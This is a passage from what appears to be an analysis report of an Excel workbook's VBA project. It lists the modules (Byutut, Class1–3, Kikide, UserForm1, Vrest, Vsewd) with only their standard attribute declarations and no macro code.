                                                                                                                                                Attribute VB_PredeclaredId = True

                                                                                                                                                6

                                                                                                                                                Attribute VB_Exposed = True

                                                                                                                                                7

                                                                                                                                                Attribute VB_TemplateDerived = False

                                                                                                                                                8

                                                                                                                                                Attribute VB_Customizable = True

                                                                                                                                                Module: Byutut

                                                                                                                                                Declaration
                                                                                                                                                LineContent
                                                                                                                                                1

                                                                                                                                                Attribute VB_Name = "Byutut"

                                                                                                                                                Module: Class1

                                                                                                                                                Declaration
                                                                                                                                                LineContent
                                                                                                                                                1

                                                                                                                                                Attribute VB_Name = "Class1"

                                                                                                                                                2

                                                                                                                                                Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"

                                                                                                                                                3

                                                                                                                                                Attribute VB_GlobalNameSpace = False

                                                                                                                                                4

                                                                                                                                                Attribute VB_Creatable = False

                                                                                                                                                5

                                                                                                                                                Attribute VB_PredeclaredId = False

                                                                                                                                                6

                                                                                                                                                Attribute VB_Exposed = False

                                                                                                                                                7

                                                                                                                                                Attribute VB_TemplateDerived = False

                                                                                                                                                8

                                                                                                                                                Attribute VB_Customizable = False

                                                                                                                                                Module: Class2

                                                                                                                                                Declaration
                                                                                                                                                LineContent
                                                                                                                                                1

                                                                                                                                                Attribute VB_Name = "Class2"

                                                                                                                                                2

                                                                                                                                                Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"

                                                                                                                                                3

                                                                                                                                                Attribute VB_GlobalNameSpace = False

                                                                                                                                                4

                                                                                                                                                Attribute VB_Creatable = False

                                                                                                                                                5

                                                                                                                                                Attribute VB_PredeclaredId = False

                                                                                                                                                6

                                                                                                                                                Attribute VB_Exposed = False

                                                                                                                                                7

                                                                                                                                                Attribute VB_TemplateDerived = False

                                                                                                                                                8

                                                                                                                                                Attribute VB_Customizable = False

                                                                                                                                                Module: Class3

                                                                                                                                                Declaration
                                                                                                                                                LineContent
                                                                                                                                                1

                                                                                                                                                Attribute VB_Name = "Class3"

                                                                                                                                                2

                                                                                                                                                Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"

                                                                                                                                                3

                                                                                                                                                Attribute VB_GlobalNameSpace = False

                                                                                                                                                4

                                                                                                                                                Attribute VB_Creatable = False

                                                                                                                                                5

                                                                                                                                                Attribute VB_PredeclaredId = False

                                                                                                                                                6

                                                                                                                                                Attribute VB_Exposed = False

                                                                                                                                                7

                                                                                                                                                Attribute VB_TemplateDerived = False

                                                                                                                                                8

                                                                                                                                                Attribute VB_Customizable = False

                                                                                                                                                Module: Kikide

                                                                                                                                                Declaration
                                                                                                                                                LineContent
                                                                                                                                                1

                                                                                                                                                Attribute VB_Name = "Kikide"

                                                                                                                                                2

                                                                                                                                                Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                                                                                                                                3

                                                                                                                                                Attribute VB_GlobalNameSpace = False

                                                                                                                                                4

                                                                                                                                                Attribute VB_Creatable = False

                                                                                                                                                5

                                                                                                                                                Attribute VB_PredeclaredId = True

                                                                                                                                                6

                                                                                                                                                Attribute VB_Exposed = True

                                                                                                                                                7

                                                                                                                                                Attribute VB_TemplateDerived = False

                                                                                                                                                8

                                                                                                                                                Attribute VB_Customizable = True

                                                                                                                                                Module: UserForm1

                                                                                                                                                Declaration
                                                                                                                                                LineContent
                                                                                                                                                1

                                                                                                                                                Attribute VB_Name = "UserForm1"

                                                                                                                                                2

                                                                                                                                                Attribute VB_Base = "0{4F079883-D63C-4E2A-AD37-7B2F61A2BACD}{A61B2430-76EA-4B1D-A381-E7C23109F48A}"

                                                                                                                                                3

                                                                                                                                                Attribute VB_GlobalNameSpace = False

                                                                                                                                                4

                                                                                                                                                Attribute VB_Creatable = False

                                                                                                                                                5

                                                                                                                                                Attribute VB_PredeclaredId = True

                                                                                                                                                6

                                                                                                                                                Attribute VB_Exposed = False

                                                                                                                                                7

                                                                                                                                                Attribute VB_TemplateDerived = False

                                                                                                                                                8

                                                                                                                                                Attribute VB_Customizable = False

                                                                                                                                                Module: Vrest

                                                                                                                                                Declaration
                                                                                                                                                LineContent
                                                                                                                                                1

                                                                                                                                                Attribute VB_Name = "Vrest"

                                                                                                                                                Module: Vsewd

                                                                                                                                                Declaration
                                                                                                                                                LineContent
                                                                                                                                                1

                                                                                                                                                Attribute VB_Name = "Vsewd"

                                                                                                                                                2

                                                                                                                                                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                                                                                3

                                                                                                                                                Attribute VB_GlobalNameSpace = False

                                                                                                                                                4

                                                                                                                                                Attribute VB_Creatable = False

                                                                                                                                                5

                                                                                                                                                Attribute VB_PredeclaredId = True

                                                                                                                                                6

                                                                                                                                                Attribute VB_Exposed = True

                                                                                                                                                7

                                                                                                                                                Attribute VB_TemplateDerived = False

                                                                                                                                                8

                                                                                                                                                Attribute VB_Customizable = True

                                                                                                                                                Reset < >